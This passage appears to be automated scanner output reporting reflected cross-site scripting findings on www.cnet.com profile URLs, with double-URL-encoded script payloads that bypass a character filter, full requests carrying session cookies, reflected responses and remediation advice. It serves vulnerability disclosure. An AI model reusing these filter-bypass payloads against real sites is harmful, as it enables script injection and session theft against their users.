This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/doreilly5966d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e76e02de3b33/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:06:51 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:06:51 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=977 Connection: Keep-Alive Content-Length: 31072
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="doreilly5966d"><script>alert(1)</script>76e02de3b33"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea481%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef185a55c57b was submitted in the REST URL parameter 2. This input was echoed as ea481"><script>alert(1)</script>f185a55c57b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dujmovicaea481%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef185a55c57b/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:06:45 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:06:46 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=979 Connection: Keep-Alive Content-Length: 31090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="dujmovicaea481"><script>alert(1)</script>f185a55c57b"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 822d6%253cscript%253ealert%25281%2529%253c%252fscript%253e29e2d4bfcb5 was submitted in the REST URL parameter 2. This input was echoed as 822d6<script>alert(1)</script>29e2d4bfcb5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/dujmovica822d6%253cscript%253ealert%25281%2529%253c%252fscript%253e29e2d4bfcb5/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:06:47 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:06:47 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=984 Connection: Keep-Alive Content-Length: 31055
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>dujmovica822d6<script>alert(1)</script>29e2d4bfcb5's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a5c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e37fd1b8b8a7 was submitted in the REST URL parameter 2. This input was echoed as 2a5c8"><script>alert(1)</script>37fd1b8b8a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/efranklin2a5c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e37fd1b8b8a7/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:10 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:10 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=954 Connection: Keep-Alive Content-Length: 31123
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="efranklin2a5c8"><script>alert(1)</script>37fd1b8b8a7"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6aae5%253cscript%253ealert%25281%2529%253c%252fscript%253e0242d66e54e was submitted in the REST URL parameter 2. This input was echoed as 6aae5<script>alert(1)</script>0242d66e54e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/efranklin6aae5%253cscript%253ealert%25281%2529%253c%252fscript%253e0242d66e54e/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:11 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:11 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=954 Connection: Keep-Alive Content-Length: 31013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>efranklin6aae5<script>alert(1)</script>0242d66e54e's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c064e%253cscript%253ealert%25281%2529%253c%252fscript%253e475aea1f3e9 was submitted in the REST URL parameter 2. This input was echoed as c064e<script>alert(1)</script>475aea1f3e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/elinormillsc064e%253cscript%253ealert%25281%2529%253c%252fscript%253e475aea1f3e9 HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:59 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:59 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=996 Connection: Keep-Alive Content-Length: 31058
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>elinormillsc064e<script>alert(1)</script>475aea1f3e9's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef9f22c8f48c was submitted in the REST URL parameter 2. This input was echoed as d7411"><script>alert(1)</script>f9f22c8f48c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/elinormillsd7411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef9f22c8f48c HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:58 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:58 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=938 Connection: Keep-Alive Content-Length: 31087
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="elinormillsd7411"><script>alert(1)</script>f9f22c8f48c"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5380%253cscript%253ealert%25281%2529%253c%252fscript%253e5a44f1ca9cf was submitted in the REST URL parameter 2. This input was echoed as c5380<script>alert(1)</script>5a44f1ca9cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/elinormillsc5380%253cscript%253ealert%25281%2529%253c%252fscript%253e5a44f1ca9cf/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:00 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:00 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=975 Connection: Keep-Alive Content-Length: 31057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>elinormillsc5380<script>alert(1)</script>5a44f1ca9cf's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bfa9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e396af8c8659 was submitted in the REST URL parameter 2. This input was echoed as 4bfa9"><script>alert(1)</script>396af8c8659 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/elinormills4bfa9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e396af8c8659/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:06:58 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:06:58 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=958 Connection: Keep-Alive Content-Length: 31083
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="elinormills4bfa9"><script>alert(1)</script>396af8c8659"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70c3f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed387a8463bf was submitted in the REST URL parameter 2. This input was echoed as 70c3f"><script>alert(1)</script>d387a8463bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ericaatnews70c3f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed387a8463bf/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:18 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:18 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=981 Connection: Keep-Alive Content-Length: 31114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="ericaatnews70c3f"><script>alert(1)</script>d387a8463bf"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43502%253cscript%253ealert%25281%2529%253c%252fscript%253e9ef21427e95 was submitted in the REST URL parameter 2. This input was echoed as 43502<script>alert(1)</script>9ef21427e95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ericaatnews43502%253cscript%253ealert%25281%2529%253c%252fscript%253e9ef21427e95/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:19 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:20 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=982 Connection: Keep-Alive Content-Length: 31104
